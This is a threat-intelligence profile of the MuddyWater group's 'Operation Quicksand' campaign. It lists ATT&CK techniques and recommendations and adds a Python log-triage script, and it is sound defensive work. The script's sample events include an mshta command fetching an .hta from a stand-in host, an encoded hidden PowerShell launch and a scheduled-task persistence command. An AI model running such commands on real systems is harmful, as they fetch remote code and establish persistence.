
Operation Quicksand: MuddyWater's Attacks to Israeli Organizations
During September 2020, a new campaign targeting many prominent Israeli organizations was identified. The campaign was attributed to the Iranian threat actor 'MuddyWater' (also known as TEMP.Zagros, Static Kitten and Seedworm).
Indicators of Compromise
Domains (1215)
Hashes (2230)
IPv4 (2537)
CVEs (10)
CVE-2020-1472, CVE-2022-47633, CVE-2017-0199, CVE-2020-0688, CVE-2018-13379, CVE-2021-45608, CVE-2021-45046, CVE-2022-45359, CVE-2017-0213, CVE-2021-44228
APT Groups
MuddyWater
Iran, Islamic Republic of
Notes
<div><p><b>MITRE ATT&CK Techniques Used by the MuddyWater APT Group</b></p>
<p><b>Reconnaissance</b></p>
<ul>
<li>T1589.002 Gather Victim Identity Information: Email Addresses</li>
</ul>
<p><b>Resource Development</b></p>
<ul>
<li>T1583.006 Acquire Infrastructure: Web Services</li>
<li>T1588.002 Obtain Capabilities: Tool</li>
</ul>
<p><b>Initial Access</b></p>
<ul>
<li>T1566.001 Phishing: Spearphishing Attachment</li>
<li>T1566.002 Phishing: Spearphishing Link</li>
</ul>
<p><b>Execution</b></p>
<ul>
<li>T1047 Windows Management Instrumentation</li>
<li>T1059.001 Command and Scripting Interpreter: PowerShell</li>
<li>T1059.003 Command and Scripting Interpreter: Windows Command Shell</li>
<li>T1059.005 Command and Scripting Interpreter: Visual Basic</li>
<li>T1059.006 Command and Scripting Interpreter: Python</li>
<li>T1059.007 Command and Scripting Interpreter: JavaScript</li>
<li>T1203 Exploitation for Client Execution</li>
<li>T1204.001 User Execution: Malicious Link</li>
<li>T1204.002 User Execution: Malicious File</li>
<li>T1559.001 Inter-Process Communication: Component Object Model</li>
<li>T1559.002 Inter-Process Communication: Dynamic Data Exchange</li>
</ul>
<p><b>Persistence</b></p>
<ul>
<li>T1053.005 Scheduled Task/Job: Scheduled Task</li>
<li>T1137.001 Office Application Startup: Office Template Macros</li>
<li>T1543.003 Create or Modify System Process: Windows Service</li>
<li>T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</li>
<li>T1547.005 Boot or Logon Autostart Execution: Security Support Provider</li>
</ul>
<p><b>Privilege Escalation</b></p>
<ul>
<li>T1134 Access Token Manipulation</li>
<li>T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control</li>
<li>T1555 Credentials from Password Stores</li>
<li>T1555.003 Credentials from Password Stores: Credentials from Web Browsers</li>
</ul>
<p><b>Defense Evasion</b></p>
<ul>
<li>T1027 Obfuscated Files or Information</li>
<li>T1027.003 Obfuscated Files or Information: Steganography</li>
<li>T1027.004 Obfuscated Files or Information: Compile After Delivery</li>
<li>T1027.005 Obfuscated Files or Information: Indicator Removal from Tools</li>
<li>T1036.005 Masquerading: Match Legitimate Name or Location</li>
<li>T1055.001 Process Injection: Dynamic-link Library Injection</li>
<li>T1055.002 Process Injection: Portable Executable Injection</li>
<li>T1140 Deobfuscate/Decode Files or Information</li>
<li>T1218.003 Signed Binary Proxy Execution: CMSTP</li>
<li>T1218.005 Signed Binary Proxy Execution: Mshta</li>
<li>T1218.011 Signed Binary Proxy Execution: Rundll32</li>
<li>T1480 Execution Guardrails</li>
<li>T1562.001 Impair Defenses: Disable or Modify Tools</li>
<li>T1574.001 Hijack Execution Flow: DLL Search Order Hijacking</li>
<li>T1574.002 Hijack Execution Flow: DLL Side-Loading</li>
<li>T1574.007 Hijack Execution Flow: Path Interception by PATH Environment Variable</li>
<li>T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking</li>
<li>T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path</li>
</ul>
<p><b>Credential Access</b></p>
<ul>
<li>T1003.001 OS Credential Dumping: LSASS Memory</li>
<li>T1003.004 OS Credential Dumping: LSA Secrets</li>
<li>T1003.005 OS Credential Dumping: Cached Domain Credentials</li>
<li>T1552.001 Unsecured Credentials: Credentials In Files</li>
<li>T1552.002 Unsecured Credentials: Credentials in Registry</li>
<li>T1552.006 Unsecured Credentials: Group Policy Preferences</li>
<li>T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting</li>
</ul>
<p><b>Discovery</b></p>
<ul>
<li>T1005 Data from Local System</li>
<li>T1012 Query Registry</li>
<li>T1016 System Network Configuration Discovery</li>
<li>T1033 System Owner/User Discovery</li>
<li>T1049 System Network Connections Discovery</li>
<li>T1057 Process Discovery</li>
<li>T1082 System Information Discovery</li>
<li>T1083 File and Directory Discovery</li>
<li>T1087.002 Account Discovery: Domain Account</li>
<li>T1482 Domain Trust Discovery</li>
<li>T1518 Software Discovery</li>
<li>T1518.001 Software Discovery: Security Software Discovery</li>
</ul>
<p><b>Collection</b></p>
<ul>
<li>T1056.001 Input Capture: Keylogging</li>
<li>T1113 Screen Capture</li>
<li>T1123 Audio Capture</li>
<li>T1560.001 Archive Collected Data: Archive via Utility</li>
</ul>
<p><b>Command and Control</b></p>
<ul>
<li>T1071.001 Application Layer Protocol: Web Protocols</li>
<li>T1090.002 Proxy: External Proxy</li>
<li>T1102.002 Web Service: Bidirectional Communication</li>
<li>T1104 Multi-Stage Channels</li>
<li>T1105 Ingress Tool Transfer</li>
<li>T1132.001 Data Encoding: Standard Encoding</li>
<li>T1132.002 Data Encoding: Non-Standard Encoding</li>
<li>T1219 Remote Access Software</li>
<li>T1572 Protocol Tunneling</li>
</ul>
<p><b>Exfiltration</b></p>
<ul>
<li>T1041 Exfiltration Over C2 Channel</li>
</ul>
</div>
<div><b>Security Recommendations Against MuddyWater</b></div>
<div><ul>
<li>MuddyWater leverages spear phishing. Provide your employees with the necessary security awareness training.</li>
<li>Gain visibility into external-facing digital assets with an Attack Surface Management solution.</li>
<li>Regularly apply security patches and software updates.</li>
<li>Apply the least privilege principle across the network, especially to critical systems and services.</li>
<li>Secure domain controllers (DC) using best practices.</li>
<li>Enable multifactor authentication (MFA) to prevent lateral movement.</li>
<li>Refer to the IOCs above and take the necessary mitigation actions.</li>
</ul></div>
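As an added example that is not part of the original report, the following Python script shows how the Execution, Persistence, Initial Access and Signed Binary Proxy Execution techniques listed above translate into a first-pass triage of process-creation telemetry. The record format (Image, ParentImage, CommandLine pairs), the matching heuristics and the sample events are all constructed for illustration; the technique IDs are the ones in the list above.

```python
"""Triage of Windows process-creation events against the ATT&CK technique
IDs listed above. Added example; the matching heuristics and the sample
events are constructed for illustration and are not from the report."""
import re
from collections import Counter

# Office applications whose child processes deserve a second look
# (spearphishing attachment -> user execution, T1566.001 / T1204.002).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters and signed proxy binaries named in the technique list above.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "cmstp.exe", "cmd.exe"}

# Records are 'Key=value' pairs; quoted values may contain spaces.
_FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# PowerShell's encoded-command switch and its common abbreviations.
_ENCODED_RE = re.compile(r"\s-(e|ec|enc|encodedcommand)\s")


def parse_event(line):
    """Parse one 'Image="..." ParentImage="..." CommandLine="..."' record."""
    return {key: value.strip('"') for key, value in _FIELD_RE.findall(line)}


def basename(path):
    """Lower-cased file name of a Windows path (C:\\x\\Y.EXE -> y.exe)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the technique IDs suggested by a single event (may be empty)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()
    hits = []
    if image == "mshta.exe":
        hits.append("T1218.005")   # Signed Binary Proxy Execution: Mshta
    if image == "rundll32.exe":
        hits.append("T1218.011")   # Signed Binary Proxy Execution: Rundll32
    if image == "cmstp.exe":
        hits.append("T1218.003")   # Signed Binary Proxy Execution: CMSTP
    if image in {"powershell.exe", "pwsh.exe"}:
        hits.append("T1059.001")   # Command and Scripting Interpreter: PowerShell
        if _ENCODED_RE.search(cmd):
            hits.append("T1027")   # Obfuscated Files or Information
    if image in {"wscript.exe", "cscript.exe"} and ".vb" in cmd:
        hits.append("T1059.005")   # Command and Scripting Interpreter: Visual Basic
    if image == "wmic.exe" and "process call create" in cmd:
        hits.append("T1047")       # Windows Management Instrumentation
    if image == "schtasks.exe" and "/create" in cmd:
        hits.append("T1053.005")   # Scheduled Task/Job: Scheduled Task
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.extend(["T1566.001", "T1204.002"])
    return hits


def triage(lines):
    """Return [(line_number, technique_ids)] for every event that matched."""
    findings = []
    for number, line in enumerate(lines, 1):
        hits = classify(parse_event(line))
        if hits:
            findings.append((number, hits))
    return findings


def technique_counts(lines):
    """How often each technique ID was observed across the whole log."""
    counts = Counter()
    for _, hits in triage(lines):
        counts.update(hits)
    return counts


# Constructed sample log (not real telemetry); 'example.invalid' never resolves.
SAMPLE_EVENTS = [
    'Image="C:\\Windows\\System32\\mshta.exe" ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" CommandLine="mshta.exe http://updates.example.invalid/doc.hta"',
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" ParentImage="C:\\Windows\\System32\\cmd.exe" CommandLine="powershell.exe -nop -w hidden -enc QQBBAEEA"',
    'Image="C:\\Windows\\System32\\wscript.exe" ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE" CommandLine="wscript.exe C:\\Users\\alice\\AppData\\Local\\Temp\\invoice.vbs"',
    'Image="C:\\Windows\\System32\\schtasks.exe" ParentImage="C:\\Windows\\System32\\cmd.exe" CommandLine="schtasks.exe /create /sc minute /mo 15 /tn Updater /tr C:\\Users\\Public\\u.vbs"',
    'Image="C:\\Windows\\System32\\notepad.exe" ParentImage="C:\\Windows\\explorer.exe" CommandLine="notepad.exe C:\\Users\\alice\\notes.txt"',
]

if __name__ == "__main__":
    for number, hits in triage(SAMPLE_EVENTS):
        print(f"event {number}: {', '.join(hits)}")
    print(dict(technique_counts(SAMPLE_EVENTS)))
```

The heuristics are deliberately coarse: they surface candidates for an analyst, and a real deployment would add parent/child allow-lists for the organization's own software before treating a hit as an alert.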
Mitigation
<p>Up-to-date backups are the most effective way of recovering from a ransomware attack; you should do the following, as N.C.S.C. suggests.</p>
<ul>
<li>Make regular backups of your most important files, which will be different for every organization; check that you know how to restore files from the backup, and regularly test that it is working as expected.</li>
<li>Ensure you create offline backups that are kept separate, in a different location (ideally offsite), from your network and systems, or in a cloud service designed for this purpose, as ransomware actively targets backups to increase the likelihood of payment. The N.C.S.C. blog post 'Offline backups in an online world' provides additional advice for organizations.</li>
<li>Make multiple copies of files using different backup solutions and storage locations. Do not rely on having two copies on a single removable drive, nor on multiple copies in a single cloud service.</li>
<li>Ensure that your backup devices (such as external hard drives and USB sticks) are not permanently connected to your network. Attackers will target connected backup devices and solutions to make recovery more complex.</li>
<li>Ensure that your cloud service protects previous backup versions from being immediately deleted and allows you to restore them. This will prevent your live and backup data from becoming inaccessible: cloud services often synchronize automatically right after your files have been replaced with encrypted copies.</li>
<li>Ensure that backups are only connected to known clean devices before starting recovery.</li>
<li>Scan backups for malware before you restore files. Ransomware may have infiltrated your network over time and replicated to backups before being discovered.</li>
<li>Regularly patch products used for backup so attackers cannot exploit any known vulnerabilities they might contain.</li>
</ul>
<p>You can reduce the likelihood of malicious content reaching your devices through a combination of the following:</p>
<ul>
<li>filtering to only allow file types you would expect to receive</li>
<li>blocking websites that are known to be malicious</li>
<li>actively inspecting the content</li>
<li>using signatures to block known malicious code</li>
</ul>
<p>Prevent malware from spreading across your organization by following N.C.S.C. guidance on preventing lateral movement. You should also:</p>
<ul>
<li>Use M.F.A. to authenticate users so that if malware steals credentials, they can't easily be reused.</li>
<li>Ensure obsolete platforms (operating systems (O.S.) and apps) are appropriately segregated from the rest of the network; refer to N.C.S.C. guidance on obsolete platforms for further details.</li>
<li>Regularly review and remove user permissions that are no longer required, to limit the malware's ability to spread.</li>
<li>Ensure system administrators avoid using their accounts for email and web browsing (to prevent malware from being able to run with their high level of system privilege).</li>
<li>Practice good asset management, including keeping track of which software versions are installed on your devices, so that you can target security updates quickly.</li>
<li>Keep devices and infrastructure patched, especially security-enforcing devices on the network boundary (such as firewalls and VPN products).</li>
</ul>
<p>A 'defense in depth' approach assumes that malware will reach your devices. You should therefore take steps to prevent malware from running. The measures required will vary for each device type, O.S., and version, but you should generally use device-level security features. Organizations should:</p>
<ul>
<li>Centrally manage devices to only permit applications trusted by the enterprise to run on machines, using technologies including AppLocker, or from trusted app stores (or other trusted locations).</li>
<li>Consider whether enterprise antivirus or anti-malware products are necessary, and keep the software (and its definition files) up to date.</li>
<li>Provide security education and awareness training to your people, for example, N.C.S.C.'s Top Tips for Staff.</li>
<li>Disable or constrain scripting environments and macros by:
<ul>
<li>enforcing PowerShell Constrained Language mode via a User Mode Code Integrity (UMCI) policy</li>
<li>protecting your systems from malicious Microsoft Office macros</li>
</ul>
</li>
<li>Disable autorun for mounted media (prevent the use of removable media if it is not needed).</li>
</ul>
<p>In addition, attackers can force their code to execute by exploiting vulnerabilities in the device. Prevent this by keeping devices well-configured and up-to-date. We recommend that you:</p>
<ul>
<li>Install security updates as soon as they become available to fix exploitable bugs in your products.</li>
<li>Enable automatic updates for O.S.s, applications, and firmware if you can.</li>
<li>Use the latest versions of O.S.s and applications to take advantage of the latest security features.</li>
<li>Configure host-based and network firewalls, disallowing inbound connections by default.</li>
</ul>
<p>Malware attacks, particularly ransomware attacks, can be devastating for organizations because computer systems are no longer available, and in some cases, data may never be recovered. Where recovery is possible at all it can take several weeks, and your corporate reputation and brand value could take much longer to recover. The following will help to ensure your organization can recover quickly.</p>
<ul>
<li>Identify your critical assets and determine the impact if they were affected by a malware attack.</li>
<li>Plan for an attack, even if you think it is unlikely. Many organizations have been impacted by collateral malware, even though they were not the intended target.</li>
<li>Develop an internal and external communication strategy. The correct information must reach the right stakeholders in a timely fashion.</li>
<li>Determine how you will respond to the ransom demand and the threat of your organization's data being published.</li>
<li>Ensure that incident management playbooks and supporting resources such as checklists and contact details are available if you cannot access your computer systems.</li>
<li>Identify your legal obligations regarding reporting incidents to regulators, and understand how to approach this.</li>
<li>Exercise your incident management plan. This helps clarify the roles and responsibilities of staff and third parties and to prioritize system recovery.</li>
</ul>
<p>After an incident, revise your incident management plan to include lessons learned, to ensure that the same event cannot occur in the same way again.</p>